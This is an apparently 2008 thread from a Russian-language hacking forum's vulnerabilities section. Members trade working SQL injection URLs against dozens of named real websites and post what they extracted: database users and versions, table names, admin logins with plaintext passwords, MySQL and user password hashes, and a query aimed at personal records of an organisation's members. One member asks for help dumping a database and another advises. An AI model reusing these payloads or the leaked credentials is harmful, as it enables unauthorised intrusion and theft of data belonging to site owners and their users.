HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 01.03.2008, 04:32
Saime
Новичок
Регистрация: 27.02.2008
Сообщений: 19
Провел на форуме:
34487

Репутация: 46
По умолчанию

aspireusa.net

Цитата:
http://aspireusa.net/category.php?cid=-1%20union%20select%201,2,3--
user() = aspire@localhost
version() = 4.1.22-log
database() = aspire

--------------

elsemanario.net

Цитата:
http://www.elsemanario.net/print_col.php?cid=-1%20union%20select%201,2,3,4,5--

user() = hdn_bo_user@neveri.venred.com
version() = 5.0.22
database() = elsema_elsemanario_net_-_db
 
Ответить с цитированием

  #2  
Старый 01.03.2008, 09:05
Saime
Новичок
Регистрация: 27.02.2008
Сообщений: 19
Провел на форуме:
34487

Репутация: 46
По умолчанию

viiphoto.com

Цитата:
http://www.viiphoto.com/frame-movie.php?vID=-1%20union%20select%201,2,3,4,5,6,7,8,9--
user() = VIIPHOTO@192.168.1.22
version() = 4.0.12-MAX-LOG
database() = VIIPHOTO

--------------

swclassiccars.com

Цитата:
http://www.swclassiccars.com/car.php?vid=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13 ,14--
user() = swclassiccars@64.202.163.213
version() = 4.0.27-max-log
database() = swclassiccars

--------------

egotvonline.com

Цитата:
http://www.egotvonline.com/video.php?vid=1'%20union%20select%201,2,3,4,5,6,7, 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2 5,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40/*
user() = egotv_website@localhost
version() = 4.1.22-standard
database() = egotv_egotv

--------------

stormnigeria.com

Цитата:
http://stormnigeria.com/music/videos.php?vid=-1%20union%20select%201,2,3,4,5,6,7--
user() = stormnig_storm@localhost
version() = 4.0.27-standard
database() = stormnig_storm

--------------

sctflash.com

Цитата:
http://www.sctflash.com/vehicle_show_profile.php?VID=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20--
user() = root@localhost
version() = 4.1.20
database() = sct
 
Ответить с цитированием

  #3  
Старый 01.03.2008, 11:36
SIdoy
Новичок
Регистрация: 19.09.2007
Сообщений: 12
Провел на форуме:
324160

Репутация: 19
По умолчанию

Код HTML:
http://www.prom.kz/modules/biblio/card.php?id=1380%20and%200%20union%20select%201,2,3,4,5,6,7,8,9,10,11,concat_ws(0x3a,version(),user(),database())--
Код HTML:
http://www.biomusic.ru/album.php?id=15819%20and%201=0%20union%20select%201,user(),Database(),4,5,6,7,user_pass,9,10,11,12,13%20from%20users%20limit%203--
Код HTML:
http://mp3.volpi.ru/view.php?id=3893%20and%201=0%20union%20select%201,concat(user,char(58),password),3,concat(user,char(58),password),5,4,7,8,9,10,11,12,13%20from%20mysql.user--
 
Ответить с цитированием

  #4  
Старый 02.03.2008, 00:45
-=megahertz=-
Участник форума
Регистрация: 23.05.2007
Сообщений: 103
Провел на форуме:
380957

Репутация: 56
Отправить сообщение для -=megahertz=- с помощью ICQ
По умолчанию

привет всем!
нужна помощь в выводе базы данных, через information_schema.tables у меня невышло
получается вывести только USER(), DATABASE(), VERSION()
http://www.manhattan-receivers.com/modules/articles/article.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20/*
 
Ответить с цитированием

  #5  
Старый 02.03.2008, 01:39
Серенький
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520

Репутация: 572
По умолчанию

Цитата:
привет всем!
нужна помощь в выводе базы данных, через information_schema.tables у меня невышло
получается вывести только USER(), DATABASE(), VERSION()
http://www.manhattan-receivers.com/modules/articles/article.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20/*
1. не там запостил.
2. версия 4 -> information_schema в ней нету.
 
Ответить с цитированием

  #6  
Старый 02.03.2008, 06:12
neon_fx
Познающий
Регистрация: 22.02.2008
Сообщений: 74
Провел на форуме:
394753

Репутация: 120
По умолчанию

Видеоархив болельщиков ФК Спартак

http://www.video-soccer.com/section.php?sec=-15+union+select+concat_ws(0x9a,user(),database(),v ersion())/*

VIDEOSOB@LINHOST209.PROD.MESA1.SECURESERVER.NET
VIDEOSOB
4.0.27-


//**************************

Белгородская торгово промышленная палата
Выставочный комплекс "Белэкспоцентр"

http://belexpocentr.ru/show.php?id=-89+union+select+1,2,3,4,5,concat_ws(char(47),user( ),database(),version()),7,8,9,10,11,12,13,14,15,16 ,17,18,19,20,21/*

belexpocentr@localhost
www_belexpocentr_ru
5.0.44

открыта база INFORMATION_SCHEMA

//**************************

Всеукраинская молодежная организация “Союз молоді регіонів України”.

http://smru.com.ua/news.php?type=n&num=-2054+union+select+1,Concat_ws(char(58),last,first, otch,birthday,educ,inst,spec,work,post,region,raio n,town,street,dom,kv,hphone,wphone,mphone,ser,num, kem,kogda),3,4,5+from+smrucom_smru.enter+limit+1+o ffset+0/*

//***************************

AMT&C - лидер Российского рынка магнитных материалов и технологий

http://www.ndfeb.ru/news.php?act=news&num=-53+union+select+1,2,user(),database(),5,6,version( )/*

00146026@localhost
db00146026
4.1.21-log

//**************************

http://www.wellness-hall.ru/news.php?num=-4+union+select+1,2,concat_ws(0x3a,user(),database( ),version()),4,5/*

u39784@10.10.223.205
u39784
5.0.45-log

//************************

http://www.keckobservatory.org/article.php?id=-46+union+select+1,concat_ws(0x3a,user(),database() ,version()),3,4,5,6,7,8,9,10,11/*

root@localhost
keck
4.1.21

//**********************
Украинский готический портал

http://gothic.kiev.ua/ukrrus/reviews/show.php?id=226'+and+1=-1+union+select+1,2,version(),4,5,6,7,8,9,10,11,12, 13,DataBase(),user(),16,17,18,19/*

4.1.22-log
gothicdb
gothic@hosting03.iptelecom.net.ua


p.s. Вот че я сегодня за ночь накопал
Всем привет

Последний раз редактировалось neon_fx; 02.03.2008 в 16:50..
 
Ответить с цитированием

  #7  
Старый 02.03.2008, 16:00
CaNNabi$
Познающий
Регистрация: 21.01.2008
Сообщений: 85
Провел на форуме:
839509

Репутация: 338
Отправить сообщение для CaNNabi$ с помощью ICQ
По умолчанию

Код:
http://www.zycie.czest.pl/modules/show.php?id=0x35333927%20union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9/*
zycie@localhost:zycie:5.0.33-log
Код:
http://www.sudguru.com/show.php?x=1&at=1&sn=0x3127%20union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9,10/*
sudee_g@localhost:sudee_s:4.1.22-standard 6
Код:
http://medhavi.edu.np/show.php?sn=0x3127%20union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9,10/*
medhavi_sunil@localhost:medhavi_sunil:4.1.22-standard
Код:
http://perplexus.info/show.php?pid=2343&cid=0x313733373327%20union+select+1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8,9,10/*
www@localhost: perplexus:4.0.21-standard
Код:
http://linkdump.be/index.php?y=2004&m=0x3627%20union+select+concat_ws(0x3a,user(),database(),version()),2,3,4,5,6,7,8/*
kwaadblo_dumpmas@localhost:kwaadblo_linkdump:4.1.2 2-standard
Код:
http://www.cuplfil.com/english/show.php?ArticleID=0x313827%20union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,user(),database(),version()),10,11,12,13,14,15,16,17,18/*
root@localhost:zhengfa_en:4.0.14-max-nt
Код:
http://www.ihrc.org.uk/show.php?id=0x3137353427%20union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11,12,13/*
dbo120565932@212.227.119.149:db120565932:4.0.27-standard-log
Код:
http://www.flugzeugbilder.de/show.php?id=0x31323332333827%20union+select+1,2,3,4,5,concat_ws(0x3a,user(),database(),version()),7,8,9,10,11,12,13,14,15,16,17,18,19,20/*
pp@localhost:fb:4.0.21-Max-log
Код:
http://www.newmedicine.pl/show.php?ktory=0x343027%20union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9,10,11,12,13/*
515707HQWV038@www4:515707HQWV038:4.1.22-standard-log
Код:
http://www.pnmedycznych.pl/show.php?ktory=0x393227%20union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16/*
515707HQWV038@www4:515707HQWV038:4.1.22-standard-log
Код:
http://www.nowapediatria.pl/show.php?ktory=0x3127%20union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11,12,13,14/*
515707HQWV038@www4:515707HQWV038:4.1.22-standard-log
Код:
http://www.nowamedycyna.pl/show.php?ktory=0x3127%20union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14/*
515707HQWV038@www4:515707HQWV038:4.1.22-standard-log
Ну вот так вот
 
Ответить с цитированием

  #8  
Старый 02.03.2008, 18:54
cash$$$
Banned
Регистрация: 06.01.2008
Сообщений: 413
Провел на форуме:
1301036

Репутация: 1334
Отправить сообщение для cash$$$ с помощью ICQ
По умолчанию

CJLO.com
Цитата:
http://www.cjlo.com/magazine/features.php?ID=99999+union+select+1,VERSION(),3,4 ,5,6,7,8,9,10/*
VERSION: 4.1.21-log
DATABASE: cjlocom
USER: cjlocom@localhost

iqmagazineonline.com
Цитата:
http://www.iqmagazineonline.com/issue.php?crumb=ARCHIVE&id=99999+union+select+1,2, 3,4,5,VERSION(),7,8,9/*
VERSION: 4.1.20
DATABASE: iqmag
USER: iqmag@localhost

hdtvmagazine.com
Цитата:
http://www.hdtvmagazine.com/programming/guide-station.php?id=99999+union+select+1,2,VERSION(),4, 5,6,7,8,9,10,11,12,13,14,15/*
VERSION: 4.1.20-standard-log
DATABASE: main
USER: hdtv_web@localhost
//вывод в title


OUR-KIEV.com
Цитата:
http://our-kiev.com/banks/details.php?id=99999+union+select+1,VERSION(),3,4, 5,6,7,8,9,10/*
VERSION: 5.0.41-community
USER: ourkiev_ourkiev@localhost
DATABASE: ourkiev_main

banksandbrokersfootball.co.uk
Цитата:
http://www.banksandbrokersfootball.co.uk/news.php?id=99999+union+select+1,VERSION(),3,4,5,6 ,7/*
VERSION: 4.0.24_Debian-10sarge2-log
USER: web176u1@localhost
DATABASE: web176db1

outerbanksbeach.com
Цитата:
http://www.outerbanksbeach.com/listings.php?id=99999+union+select+1,USER(),3,4,5, 6,7,8,9,10,11/*
VERSION: 4.1.20
DATABASE: outerbanksbeach
USER: obbuser@localhost
 
Ответить с цитированием

  #9  
Старый 02.03.2008, 20:03
gibson
Постоянный
Регистрация: 24.02.2006
Сообщений: 447
Провел на форуме:
2872049

Репутация: 705
Отправить сообщение для gibson с помощью ICQ
По умолчанию

ameritron.com кто доковыряет то молодец)
Цитата:
http://www.ameritron.com/products.php?catid=3+where+prod.id=3/*
thermatex.co.uk
Цитата:
http://www.thermatex.co.uk/products.php?CatID=-1+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,concat_ws (0x3a,version(),user(),database()),5--
5.0.51-log:thermat_root@80.243.176.29:thermat_thermatex_c o_uk
Цитата:
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
KEY_COLUMN_USAGE
USER_PRIVILEGES
VIEWS
oldreseller
tblcontent
tblprod
tblprodcat
tblprodold
tblprodtype
tblreseller
tbluser
Username
Password
UserType
id
nic:nac:Admin:1
bob1:robert:standard:2
bob2:robert:Admin:3
al:alb1genesis:admin:4
kupiteplo.ru
Цитата:
http://www.kupiteplo.ru/products.php?catid=-1+union+select+1,concat_ws(0x3a,version(),user(),d atabase())--
4.1.21-log:00105446@localhost:db00105446
locksafe.com.au
Цитата:
http://www.locksafe.com.au/products.php?catId=-1+union+select+1,2,3,4,5,6,7,8,9,10,1,2,3--
4.1.20-log:locksafe@mysql.web.westnet.com.au:locksafe
blueovalindustries.com
Цитата:
http://www.blueovalindustries.com/products.php?catID=-1+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,versio n(),user(),database()),9,0--
5.0.51a:webaccess@localhost:blueovalindustries
Цитата:
root:*6D2ADA5F6F4F9A257108D488A7270AE3B61543E9:Y:l ocalhost
root:*50A1A0ED3324F8FDBABD11942CE78F3261E2470E:Y:b luekey2.bluekeyinc.com
adm:*50A1A0ED3324F8FDBABD11942CE78F3261E2470E:Y:%
webaccess:*3834634CF62016AE9ADB081C643955D18109FB1 E:Y:localhost
keith:*3C2D7500AD57EFBCA3064D22BFE074A4CF1674F9:Y: %
newkirk_backup:*1B68D251DBE5F2053D62E070E3BE403D87 79FE23:Y:%
newwebaccess:*3C2D7500AD57EFBCA3064D22BFE074A4CF16 74F9:Y:secure.massresort.com
migrate:*1B68D251DBE5F2053D62E070E3BE403D8779FE23: N:64.34.179.15
servare:*1015954A8D4060B721936C7DE453BAD4E3AD4A27: Y:bluekey2.bluekeyinc.com
provenrepellents.com
Цитата:
http://www.provenrepellents.com/products.php?catID=-1+union+select+1,2,3,4,5,6,7,concat(username,char( 58),password,char(58),accountID,char(58),realname) +from+users+limit+3,1--
Цитата:
kelly:12144a6901bc651c826d1d6c613ab5db:0:Kelly Thornton
danny:307ce74f5fa0fb48a6fa4158147277c3:0aniel Beckley
randy:12144a6901bc651c826d1d6c613ab5db:0:Randy Atkins
anne:74563ba21a90da13dacf2a73e3ddefa7:0:Anne McMahon
realwheel.net
Цитата:
http://www.realwheel.net/products.php?catid=-1+union+select+1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7, 8,9,10,1,2--
4.1.22-standard:realecg_dba@localhost:realecg_real
harvestsafe.com
Цитата:

http://www.harvestsafe.com/products.php?catID=-1+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,versio n(),user(),database())--
5.0.51a:webaccess@localhost:bluekey2
Цитата:
root:*6D2ADA5F6F4F9A257108D488A7270AE3B61543E9:Y:l ocalhost
adam-rouilly.co.uk
Цитата:
http://www.adam-rouilly.co.uk/products.php?catid=-1+union+select+1,2,concat_ws(0x3a,version(),user() ,database()),4,5--
4.1.22-standard:adam_adam@localhost:adam_adamrouilly
 
Ответить с цитированием

  #10  
Старый 02.03.2008, 20:09
159932
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038

Репутация: 1385


По умолчанию

101.ru
Цитата:
http://www.101.ru/?an=guest_book&kw1=33'+union+select+1,2,3,4,5,6,7, 8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2/*
вывода не добился - а подбирать лень
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ